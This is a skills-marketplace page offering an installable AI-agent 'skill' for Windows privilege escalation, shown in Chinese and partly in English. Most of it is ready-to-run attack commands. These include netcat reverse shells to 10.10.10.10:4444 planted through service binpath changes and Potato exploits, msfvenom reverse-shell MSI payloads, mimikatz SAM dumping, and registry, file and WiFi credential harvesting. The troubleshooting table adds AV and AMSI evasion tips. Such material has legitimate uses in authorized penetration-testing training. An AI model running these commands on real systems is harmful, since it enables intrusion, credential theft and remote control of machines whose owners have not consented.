Windows权限提升渗透测试指南:从枚举到漏洞利用的系统性方法论
Windows Privilege Escalation by automindtechnologie-jpg/ultimate-skill.md
安装命令
npx skills add https://github.com/automindtechnologie-jpg/ultimate-skill.md --skill 'Windows Privilege Escalation'🇨🇳中文介绍
Windows 权限提升
目的
在渗透测试活动中,提供系统性的方法论来发现和利用 Windows 系统上的权限提升漏洞。本技能涵盖系统枚举、凭据收集、服务利用、令牌模拟、内核漏洞利用以及各种配置错误,这些错误使得从标准用户权限提升到管理员或 SYSTEM 权限成为可能。
输入 / 前提条件
- 初始访问 : 以标准用户身份获得 Windows 系统的 Shell 或 RDP 访问权限
- 枚举工具 : WinPEAS、PowerUp、Seatbelt 或手动命令
- 漏洞利用二进制文件 : 预编译的漏洞利用程序或传输工具的能力
- 知识 : 了解 Windows 安全模型和权限
- 授权 : 进行渗透测试活动的书面许可
输出 / 交付成果
- 权限提升路径 : 已识别的提升权限的向量
- 凭据转储 : 收集到的密码、哈希值或令牌
- 提升的 Shell : 以管理员或 SYSTEM 身份执行命令
- 漏洞报告 : 配置错误和漏洞利用的文档记录
- 修复建议 : 针对已识别弱点的修复方案
核心工作流程
1. 系统枚举
基本系统信息
# OS version and patches
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
# Architecture
wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%
# Environment variables
set
Get-ChildItem Env: | ft Key,Value
# List drives
wmic logicaldisk get caption,description,providername
用户枚举
# Current user
whoami
echo %USERNAME%
# User privileges
whoami /priv
whoami /groups
whoami /all
# All users
net user
Get-LocalUser | ft Name,Enabled,LastLogon
# User details
net user administrator
net user %USERNAME%
# Local groups
net localgroup
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
网络枚举
# Network interfaces
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
# Routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric
# ARP table
arp -A
# Active connections
netstat -ano
# Network shares
net share
# Domain Controllers
nltest /DCLIST:DomainName
防病毒软件枚举
# Check AV products
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
2. 凭据收集
SAM 和 SYSTEM 文件
# SAM file locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
# SYSTEM file locations
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
# Extract hashes (from Linux after obtaining files)
pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt
# Crack with John
john --format=NT sam.txt
HiveNightmare (CVE-2021-36934)
# Check vulnerability
icacls C:\Windows\System32\config\SAM
# Vulnerable if: BUILTIN\Users:(I)(RX)
# Exploit with mimikatz
mimikatz> token::whoami /full
mimikatz> misc::shadowcopies
mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
搜索密码
# Search file contents
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
# Search registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Windows Autologin credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
# PuTTY sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# VNC passwords
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
# Search for specific files
dir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*
where /R C:\ *.ini
Unattend.xml 凭据
# Common locations
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
# Search for files
dir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul
# Decode base64 password (Linux)
echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d
WiFi 密码
# List profiles
netsh wlan show profile
# Get cleartext password
netsh wlan show profile <SSID> key=clear
# Extract all WiFi passwords
for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Key" | find /v "Number" & echo.) & @echo on
PowerShell 历史记录
# View PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
3. 服务利用
不正确的服务权限
# Find misconfigured services
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -ucqv <service_name>
# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG
# Exploit vulnerable service
sc config <service> binpath= "C:\nc.exe -e cmd.exe 10.10.10.10 4444"
sc stop <service>
sc start <service>
未加引号的服务路径
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\"
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
# Exploit: Place malicious exe in path
# For path: C:\Program Files\Some App\service.exe
# Try: C:\Program.exe or C:\Program Files\Some.exe
AlwaysInstallElevated
# Check if enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must return 0x1 for vulnerability
# Create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi
# Install (runs as SYSTEM)
msiexec /quiet /qn /i C:\evil.msi
4. 令牌模拟
检查模拟权限
# Look for these privileges
whoami /priv
# Exploitable privileges:
# SeImpersonatePrivilege
# SeAssignPrimaryTokenPrivilege
# SeTcbPrivilege
# SeBackupPrivilege
# SeRestorePrivilege
# SeCreateTokenPrivilege
# SeLoadDriverPrivilege
# SeTakeOwnershipPrivilege
# SeDebugPrivilege
Potato 攻击
# JuicyPotato (Windows Server 2019 and below)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.10.10 4444 -e cmd.exe" -t *
# PrintSpoofer (Windows 10 and Server 2019)
PrintSpoofer.exe -i -c cmd
# RoguePotato
RoguePotato.exe -r 10.10.10.10 -e "C:\nc.exe 10.10.10.10 4444 -e cmd.exe" -l 9999
# GodPotato
GodPotato.exe -cmd "cmd /c whoami"
5. 内核漏洞利用
查找内核漏洞
# Use Windows Exploit Suggester
systeminfo > systeminfo.txt
python wes.py systeminfo.txt
# Or use Watson (on target)
Watson.exe
# Or use Sherlock PowerShell script
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1
常见内核漏洞利用
MS17-010 (EternalBlue) - Windows 7/2008/2003/XP
MS16-032 - Secondary Logon Handle - 2008/7/8/10/2012
MS15-051 - Client Copy Image - 2003/2008/7
MS14-058 - TrackPopupMenu - 2003/2008/7/8.1
MS11-080 - afd.sys - XP/2003
MS10-015 - KiTrap0D - 2003/XP/2000
MS08-067 - NetAPI - 2000/XP/2003
CVE-2021-1732 - Win32k - Windows 10/Server 2019
CVE-2020-0796 - SMBGhost - Windows 10
CVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019
6. 其他技术
DLL 劫持
# Find missing DLLs with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll
# Compile malicious DLL
# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll
使用保存的凭据运行 Runas
# List saved credentials
cmdkey /list
# Use saved credentials
runas /savecred /user:Administrator "cmd.exe /k whoami"
runas /savecred /user:WORKGROUP\Administrator "\\10.10.10.10\share\evil.exe"
WSL 利用
# Check for WSL
wsl whoami
# Set root as default user
wsl --default-user root
# Or: ubuntu.exe config --default-user root
# Spawn shell as root
wsl whoami
wsl python -c 'import os; os.system("/bin/bash")'
快速参考
枚举工具
| 工具 | 命令 | 用途 |
|---|---|---|
| WinPEAS | winPEAS.exe | 综合枚举 |
| PowerUp | Invoke-AllChecks | 服务/路径漏洞 |
| Seatbelt | Seatbelt.exe -group=all | 安全检查 |
| Watson | Watson.exe | 缺失补丁 |
| JAWS | .\jaws-enum.ps1 | 旧版 Windows 枚举 |
默认可写文件夹
C:\Windows\Temp
C:\Windows\Tasks
C:\Users\Public
C:\Windows\tracing
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
常见权限提升向量
| 向量 | 检查命令 |
|---|---|
| 未加引号的路径 | `wmic service get pathname |
| 弱服务权限 | accesschk.exe -uwcqv "Everyone" * |
| AlwaysInstallElevated | reg query HKCU\...\Installer /v AlwaysInstallElevated |
| 存储的凭据 | cmdkey /list |
| 令牌权限 | whoami /priv |
| 计划任务 | schtasks /query /fo LIST /v |
模拟权限利用
| 权限 | 工具 | 用法 |
|---|---|---|
| SeImpersonatePrivilege | JuicyPotato | CLSID 滥用 |
| SeImpersonatePrivilege | PrintSpoofer | 后台打印程序服务 |
| SeImpersonatePrivilege | RoguePotato | OXID 解析器 |
| SeBackupPrivilege | robocopy /b | 读取受保护文件 |
| SeRestorePrivilege | Enable-SeRestorePrivilege | 写入受保护文件 |
| SeTakeOwnershipPrivilege | takeown.exe | 获取文件所有权 |
约束与限制
操作边界
- 内核漏洞利用可能导致系统不稳定
- 某些漏洞利用需要特定的 Windows 版本
- AV/EDR 可能检测并阻止常见工具
- 令牌模拟需要服务账户上下文
- 某些技术需要 GUI 访问权限
检测注意事项
- 凭据转储会触发安全警报
- 服务修改会记录在事件日志中
- PowerShell 执行可能被监控
- 已知的漏洞利用签名会被 AV 检测到
法律要求
- 仅测试获得书面授权的系统
- 记录所有提权尝试
- 避免干扰生产系统
- 通过适当的渠道报告所有发现
示例
示例 1:服务二进制路径利用
# Find vulnerable service
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Result: RW MyService SERVICE_ALL_ACCESS
# Check current config
sc qc MyService
# Stop service and change binary path
sc stop MyService
sc config MyService binpath= "C:\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc start MyService
# Catch shell as SYSTEM
示例 2:AlwaysInstallElevated 利用
# Verify vulnerability
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both return: 0x1
# Generate payload (attacker machine)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
# Transfer and execute
msiexec /quiet /qn /i C:\Users\Public\shell.msi
# Catch SYSTEM shell
示例 3:JuicyPotato 令牌模拟
# Verify SeImpersonatePrivilege
whoami /priv
# SeImpersonatePrivilege Enabled
# Run JuicyPotato
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe 10.10.10.10 4444 -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
# Catch SYSTEM shell
示例 4:未加引号的服务路径
# Find unquoted path
wmic service get name,pathname | findstr /i /v """
# Result: C:\Program Files\Vuln App\service.exe
# Check write permissions
icacls "C:\Program Files\Vuln App"
# Result: Users:(W)
# Place malicious binary
copy C:\Users\Public\shell.exe "C:\Program Files\Vuln.exe"
# Restart service
sc stop "Vuln App"
sc start "Vuln App"
示例 5:从注册表收集凭据
# Check for auto-logon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# DefaultUserName: Administrator
# DefaultPassword: P@ssw0rd123
# Use credentials
runas /user:Administrator cmd.exe
# Or for remote: psexec \\target -u Administrator -p P@ssw0rd123 cmd
故障排除
| 问题 | 原因 | 解决方案 |
|---|---|---|
| 漏洞利用失败 (AV 检测到) | AV 阻止已知漏洞利用 | 使用混淆的漏洞利用;无文件攻击 (mshta, certutil);自定义编译的二进制文件 |
| 服务无法启动 | 二进制路径语法错误 | 确保 binpath 中 = 后有空格:binpath= "C:\path\binary.exe" |
| 令牌模拟失败 | 错误的权限/版本 | 检查 whoami /priv;验证 Windows 版本兼容性 |
| 找不到内核漏洞利用 | 系统已打补丁 | 运行 Windows Exploit Suggester:python wes.py systeminfo.txt |
| PowerShell 被阻止 | 执行策略/AMSI | 使用 powershell -ep bypass -c "cmd" 或 |
每周安装次数
0
仓库
首次出现
1970年1月1日
安全审计
🇺🇸English
Windows Privilege Escalation
Purpose
Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.
Inputs / Prerequisites
- Initial Access : Shell or RDP access as standard user on Windows system
- Enumeration Tools : WinPEAS, PowerUp, Seatbelt, or manual commands
- Exploit Binaries : Pre-compiled exploits or ability to transfer tools
- Knowledge : Understanding of Windows security model and privileges
- Authorization : Written permission for penetration testing activities
Outputs / Deliverables
- Privilege Escalation Path : Identified vector to higher privileges
- Credential Dump : Harvested passwords, hashes, or tokens
- Elevated Shell : Command execution as Administrator or SYSTEM
- Vulnerability Report : Documentation of misconfigurations and exploits
- Remediation Recommendations : Fixes for identified weaknesses
Core Workflow
1. System Enumeration
Basic System Information
# OS version and patches
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
# Architecture
wmic os get osarchitecture
echo %PROCESSOR_ARCHITECTURE%
# Environment variables
set
Get-ChildItem Env: | ft Key,Value
# List drives
wmic logicaldisk get caption,description,providername
广告位招租
在这里展示您的产品或服务
触达数万 AI 开发者,精准高效
